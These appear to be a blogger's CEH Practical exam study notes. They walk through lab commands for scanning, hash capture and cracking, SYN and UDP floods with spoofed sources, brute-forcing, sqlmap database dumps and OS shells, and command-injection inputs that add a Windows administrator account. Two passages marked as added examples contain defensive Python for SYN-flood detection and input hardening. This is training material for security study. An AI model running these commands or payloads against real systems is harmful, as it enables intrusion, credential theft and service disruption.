CEH Practical notes
Vihan Mehta
February 4, 2022
https://www.fencytech.com/?p=2259 1/40
14/04/2022, 11:25 CEH Practical notes – 𝔣𝔢𝔫𝔠𝔶𝔱𝔢𝔠𝔥
Module 03: Scanning Networks
Lab1-Task1: Host discovery scan
->nmap -sn -PS [IP]
->-PS: TCP SYN Ping scan
->nmap -sn -PA [IP]
->-PA: TCP ACK Ping scan
->nmap -sn -PO [IP]
->-PO: IP Protocol Ping scan
Lab2-Task3: Port and Service Discovery
->nmap -sM -v [IP]
->-sM: TCP Maimon scan
->nmap -sA -v [IP]
->-sA: ACK flag probe scan
->nmap -sU -v [IP]
->-sU: UDP scan
->nmap -sI [zombie IP] -v [IP]
->-sI: IDLE/IPID Header scan (takes the zombie host as its argument)
->nmap -sY -v [IP]
->-sY: SCTP INIT Scan
->nmap -sZ -v [IP]
->-sZ: SCTP COOKIE ECHO Scan
->nmap -sV -v [IP]
->-sV: Detect service versions
->nmap -A -v [IP]
->-A: Aggressive scan
Lab3-Task2: OS Discovery
->nmap -A -v [IP]
->-A: Aggressive scan
->nmap -O -v [IP]
->-O: OS discovery
->nmap --script smb-os-discovery.nse [IP]
->--script: Specify the customized script
->smb-os-discovery.nse: Determine the OS, computer name, domain, workgroup, and current time over the SMB protocol (Port 445 or 139)
Module 04: Enumeration
Lab2-Task1: Enumerate SNMP using snmp-check
nmap -sU -p 161 [IP]
->snmp-check [IP]
Addition
nbtstat -a [IP]
nbtstat -c
Module 06: System Hacking
Lab1-Task1: Perform Active Online Attack to Crack the System's Password using Responder
->Linux:
cd
cd Responder
chmod +x ./Responder.py
->sudo ./Responder.py -I eth0
passwd: ****
->Windows
run \CEH-Tools
->Linux:
Home/Responder/logs/SMB-NTLMv2-SSP-[IP].txt
sudo snap install john-the-ripper
passwd: ****
->sudo john /home/ubuntu/Responder/logs/SMB-NTLMv2-SSP-10.10.10.10.txt
Lab3-Task6: Covert Channels using Covert_TCP
->Attacker:
cd Desktop
mkdir Send
cd Send
echo "Secret" > message.txt
Place->Network
Ctrl+L
->smb://[IP]
Account & Password
copy and paste covert_tcp.c
->cc -o covert_tcp covert_tcp.c
->Target:
->tcpdump -nvvx port 8888 -i lo
cd Desktop
mkdir Receive
cd Receive
File->Ctrl+L
smb://[IP]
copy and paste covert_tcp.c
cc -o covert_tcp covert_tcp.c
->./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/Receive/receive.txt
->Tcpdump captures no packets
->Attacker
->./covert_tcp -dest 10.10.10.9 -source 10.10.10.13 -source_port 8888 -dest_port 9999 -file /home/attacker/Desktop/send/message.txt
Wireshark (message string being sent in individual packets)
Lab0-Task0: Rainbowcrack and QuickStego
Use Winrtgen to generate a rainbow table
Launch RainbowCrack
File->Load NTLM Hashes from PWDUMP File
Rainbow Table->Search Rainbow Table
Use the generated rainbow table
RainbowCrack automatically starts to crack the hashes
Lab0-Task1: Rainbowcrack and QuickStego
Launch QuickStego
Open Image, and select target .jpg file
Open Text, and select a txt file
Hide text, save image file
Re-launch, Open Image
Select stego file
Hidden text shows up
Module 08: Sniffing
Lab2-Task1: Password Sniffing using Wireshark
->Attacker
Wireshark
->Target
www.moviescope.com
Login
->Attacker
Stop capture
File->Save as
Filter: http.request.method==POST
RDP log in Target
service start Remote Packet Capture Protocol v.0 (experimental)
Log off Target
Wireshark->Capture options->Manage Interface->Remote Interfaces
Add a remote host and its interface
Fill info
->Target
Log in
Browse website and log in
->Attacker
Get packets
Module 10: Denial-of-Service
Lab1-Task2: Perform a DoS Attack on a Target Host using hping3
->Target:
Wireshark->Ethernet
->Attacker
->hping3 -S [Target IP] -a [Spoofable IP] -p 22 --flood
->-S: Set the SYN flag
->-a: Spoof the IP address
->-p: Specify the destination port
->--flood: Send a huge number of packets
->Target
Check wireshark
->Attacker (Perform PoD)
->hping3 -d 65538 -S -p 21 --flood [Target IP]
->-d: Specify data size
->-S: Set the SYN flag
->Attacker (Perform UDP application layer flood attack)
nmap -p 139 10.10.10.19 (check service)
->hping3 -2 -p 139 --flood [IP]
->-2: Specify UDP mode
->Other UDP-based applications and their ports
CharGen UDP Port 19
SNMPv2 UDP Port 161
QOTD UDP Port 17
RPC UDP Port 135
SSDP UDP Port 1900
CLDAP UDP Port 389
TFTP UDP Port 69
NetBIOS UDP Port 137,138,139
NTP UDP Port 123
Quake Network Protocol UDP Port 26000
VoIP UDP Port 5060
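What the "Check wireshark" step on the target looks like as detection logic: an added example, not part of the original notes, that counts half-open TCP flows per service in tcpdump -n text output. The line format, the function names, the threshold and the sample capture are assumptions constructed for this example.

```python
import re
from collections import Counter

# tcpdump -n text line for TCP over IPv4 (format assumed for this example), e.g.
# 12:00:00.000100 IP 10.10.10.99.2000 > 10.10.10.10.22: Flags [S], seq 1, win 512, length 0
LINE = re.compile(
    r"IP (\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+): Flags \[([^\]]+)\]"
)

def half_open_by_service(lines):
    """Count, per (dst_ip, dst_port), flows that sent a SYN but never a bare ACK."""
    syn_seen, completed = set(), set()
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue                      # non-TCP or unparsable line
        src, sport, dst, dport, flags = m.groups()
        flow = (src, int(sport), dst, int(dport))
        if flags == "S":                  # first step: client SYN
            syn_seen.add(flow)
        elif flags == "." and flow in syn_seen:
            completed.add(flow)           # third step: client ACK
    return dict(Counter((dst, dport) for _, _, dst, dport in syn_seen - completed))

def syn_flood_suspects(lines, threshold=100):
    """Services whose half-open count reaches the threshold (hypothetical default)."""
    counts = half_open_by_service(lines)
    return sorted(svc for svc, n in counts.items() if n >= threshold)

def sample_capture():
    """Constructed capture: 200 unanswered SYNs to port 22, 3 full handshakes to port 80."""
    out = []
    for i in range(200):                  # one source address, source port rising per packet
        out.append(f"12:00:00.{i:06d} IP 10.10.10.99.{2000 + i} > 10.10.10.10.22: "
                   "Flags [S], seq 1, win 512, length 0")
    for i in range(3):                    # normal clients completing the handshake
        c, s = f"10.10.10.5.{40000 + i}", "10.10.10.10.80"
        out.append(f"12:00:01.{i:06d} IP {c} > {s}: Flags [S], seq 7, win 64240, length 0")
        out.append(f"12:00:01.{i:06d} IP {s} > {c}: Flags [S.], seq 9, ack 8, win 65160, length 0")
        out.append(f"12:00:01.{i:06d} IP {c} > {s}: Flags [.], ack 10, win 502, length 0")
    return out

if __name__ == "__main__":
    print(syn_flood_suspects(sample_capture()))
```

Because the source address is spoofed, the SYN-ACKs never reach a host that will answer them, so the count of flows stuck after the first SYN is a more reliable signal than the source address itself.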
Module 13: Hacking Web Servers
Lab2-Task1: Crack FTP Credentials using a Dictionary Attack
nmap -p 21 [IP]
->hydra -L usernames.txt -P passwords.txt ftp://10.10.10.10
Module 14: Hacking Web Applications
Lab2-Task1: Perform a Brute-force Attack using Burp Suite
Burpsuite
Type random credentials
capture the request, right click->send to Intruder
Intruder->Positions
Clear $
Attack type: Cluster bomb
select account and password value, Add $
Payloads: Load wordlist file for set 1 and set 2
start attack
->filter status==302
open the raw, get the credentials
recover proxy settings
Lab2-Task3: Exploit Parameter Tampering and XSS Vulnerabilities in Web Applications
Log in to a website, change the parameter value (id) in the URL
Conduct an XSS attack: Submit script codes via text area
Lab2-Task5: Enumerate and Hack a Web Application using WPScan and Metasploit
->wpscan --api-token (token) --url http://10.10.10.16:8080/CEH --plugins-detection aggressive --enumerate u
->--enumerate u: Specify the enumeration of users
->API Token: Register at https://wpscan.com/register
service postgresql start
msfconsole
->use auxiliary/scanner/http/wordpress_login_enum
show options
->set PASS_FILE password.txt
->set RHOST 10.10.10.16
->set RPORT 8080
->set TARGETURI http://10.10.10.16:8080/CEH
->set USERNAME admin
run
Find the credential
Lab2-Task6: Exploit a Remote Command Execution Vulnerability to Compromise a Target Web Server (DVWA low level security)
If a command injection vulnerability is found in an input textfield
| hostname
| whoami
->| tasklist| Taskkill /PID /F
->/PID: Process ID value of the process
->/F: Forcefully terminate the process
| dir C:\
->| net user
->| net user user001 /Add
->| net user user001
->| net localgroup Administrators user001 /Add
Use created account user001 to log in remotely
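Why the "|" inputs above work, and the fix, as an added example that is not part of the original notes: the vulnerable form passes the field to a shell as one string, the hardened form accepts only a literal IP address and builds an argument list. It assumes the field is meant to take an address to ping on a Windows host; all function names are hypothetical.

```python
import ipaddress
import subprocess

# Inputs in the style the notes list for the vulnerable field (constructed sample).
PAGE_STYLE_INPUTS = ["| hostname", "| whoami", "| dir C:\\",
                     "| net user user001 /Add"]

def build_command_vulnerable(user_input):
    """BEFORE: one string for the shell, so '|' in the input starts a second command."""
    return "ping -n 4 " + user_input      # would be run with shell=True

def build_command_hardened(user_input):
    """AFTER: accept only a literal IP address and build an argv list (no shell)."""
    addr = ipaddress.ip_address(user_input.strip())   # ValueError on anything else
    return ["ping", "-n", "4", str(addr)]

def run_ping(user_input, timeout=10):
    """Hardened handler: validate first, then execute without a shell."""
    try:
        argv = build_command_hardened(user_input)
    except ValueError:
        return None                       # reject; the caller answers 400 and logs it
    return subprocess.run(argv, shell=False, capture_output=True,
                          text=True, timeout=timeout)

def rejected(inputs):
    """Return the inputs the hardened builder refuses."""
    bad = []
    for value in inputs:
        try:
            build_command_hardened(value)
        except ValueError:
            bad.append(value)
    return bad

if __name__ == "__main__":
    print(build_command_vulnerable(PAGE_STYLE_INPUTS[1]))   # the pipe reaches the shell
    print(rejected(PAGE_STYLE_INPUTS + ["10.10.10.16"]))
```

Rejected inputs are worth logging with the client address: a run of "|" or "&" values against one form field is a clear sign that the field is being probed.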
Module 15: SQL Injection
Lab1-Task2: Perform an SQL Injection Attack Against MSSQL to Extract Databases using sqlmap
Login a website
Inspect element
Dev tools->Console: document.cookie
->sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" --dbs
->-u: Specify the target URL
->--cookie: Specify the HTTP cookie header value
->--dbs: Enumerate DBMS databases
Get a list of databases
Select a database to extract its tables
->sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" -D moviescope --tables
->-D: Specify the DBMS database to enumerate
->--tables: Enumerate DBMS database tables
Get a list of tables
Select a column
->sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" -D moviescope -T User_Login --dump
Get table data of this column
->sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="value" --os-shell
Get the OS Shell
TASKLIST
Module 20: Cryptography
Lab1-Task2: Calculate MD5 Hashes using MD5 Calculator
Nothing special
Lab4-Task1: Perform Disk Encryption using VeraCrypt
Click VeraCrypt
Create Volume
Create an encrypted file container
Specify a path and file name
Set password
Select NAT
Move the mouse randomly for some seconds, and click Format
Exit
Select a drive, select file, open, mount
Input password
Dismount
Exit
Module Appendix: Covered Tools
->Nmap
Multiple Labs
->Hydra
Module 13: Lab2-Task1
->Sqlmap
Module 15: Lab1-Task2
->WPScan
Module 14: Lab2-Task5
wpscan --url http://10.10.10.10 -t 50 -U admin -P rockyou.txt
->Nikto
https://zhuanlan.zhihu.com/p/124246499
->John
Module 06: Lab1-Task1
->Hashcat
->Crack MD5 passwords with a wordlist:
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
->Crack MD5 passwords in a certain format:
hashcat -m 0 -a 3 ./hash.txt 'SKY-HQNT-?d?d?d?d'
https://xz.aliyun.com/t/4008
https://tools.kali.org/password-attacks/hashcat
->Metasploit
Module 14: Lab2-Task5
->Responder LLMNR
Module 06: Lab1-Task1
->Wireshark or Tcpdump
Multiple Labs
->Steghide
->Hide
steghide embed -cf [img file] -ef [file to be hidden]
steghide embed -cf 1.jpg -ef 1.txt
Enter password or skip
->Extract
steghide info 1.jpg
steghide extract -sf 1.jpg
Enter password if it does exist
->OpenStego
https://www.openstego.com/
->QuickStego
Module 06: Lab0-Task1
->Dirb (Web content scanner)
https://medium.com/tech-zoom/dirb-a-web-content-scanner-bc9cba624c86
https://blog.csdn.net/weixin_44912169/article/details/105655195
->Searchsploit (Exploit-DB)
https://www.hackingarticles.in/comprehensive-guide-on-searchsploit/
->Crunch (wordlist generator)
https://www.cnblogs.com/wpjamer/p/9913380.html
->Cewl (URL spider)
https://www.freebuf.com/articles/network/190128.html
->Veracrypt
Module 20: Lab4-Task1
->Hashcalc
Module 20: Lab1-Task1 (Nothing special)
->Rainbow Crack
Module 06: Lab0-Task0
->Windows SMB
smbclient -L [IP]
smbclient //[IP]/sharename
nmap -p 445 -sV --script smb-enum-services [IP]
->Run Nmap at the beginning
nmap -sn -PR 192.168.1.1/24 -oN ip.txt
nmap -A -T4 -vv -iL ip.txt -oN nmap.txt
nmap -sU -sV -A -T4 -v -oN udp.txt [IP]
https://www.stationx.net/nmap-cheat-sheet/
https://www.poftut.com/how-to-scan-wordpress-sites-with-wpscan-tutorial-for-security-vulnerabilities/
https://www.hackingarticles.in/database-penetration-testing-using-sqlmap-part-1/
https://securitytutorials.co.uk/brute-forcing-passwords-with-thc-hydra/
https://linuxconfig.org/password-cracking-with-john-the-ripper-on-linux
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/
Happy hacking – best wishes for exam.